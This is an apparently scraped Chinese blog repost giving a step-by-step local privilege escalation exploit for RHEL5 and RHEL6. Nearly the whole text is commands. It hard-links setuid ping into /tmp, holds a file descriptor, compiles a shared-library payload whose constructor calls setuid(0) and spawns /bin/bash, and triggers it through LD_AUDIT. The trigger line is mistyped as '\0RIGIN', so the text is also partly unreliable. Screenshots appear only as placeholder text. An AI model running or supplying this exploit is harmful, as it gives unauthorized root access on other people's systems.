2.l"/>

普通用户提权

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了普通用户提权相关的知识,希望对你有一定的参考价值。

说明:RHEL5—RHEL6下  都可以提权


1. ls -ld /tmp/

 技术分享


2. ls -l /bin/ping

 技术分享


3. mkdir /tmp/exploit ; ln /bin/ping /tmp/exploit/target

 技术分享


4. exec 3< /tmp/exploit/target ;  rm -rf /tmp/exploit/ ; ls -l /proc/$$/fd/3


 技术分享


 技术分享 


5. vim payload.c

   void __attribute__((constructor)) init()

   {

    setuid(0);

    system("/bin/bash");

   }


 技术分享

 

6. gcc -w -fPIC -shared -o /tmp/exploit payload.c ; ls -l /tmp/exploit

 技术分享



7. LD_AUDIT="\0RIGIN" exec /proc/self/fd/3

 技术分享



本文出自 “一马踏平川” 博客,请务必保留此出处http://huangzp.blog.51cto.com/12434999/1911772

以上是关于普通用户提权的主要内容,如果未能解决你的问题,请参考以下文章

Ansible 使用普通用户_免密+提权

Ansible 使用普通用户_免密+提权

Ansible 使用普通用户_免密+提权

Docker普通用户不使用sudo提权

普通用户提权

RHCSA-A16. 设置普通用户提权免密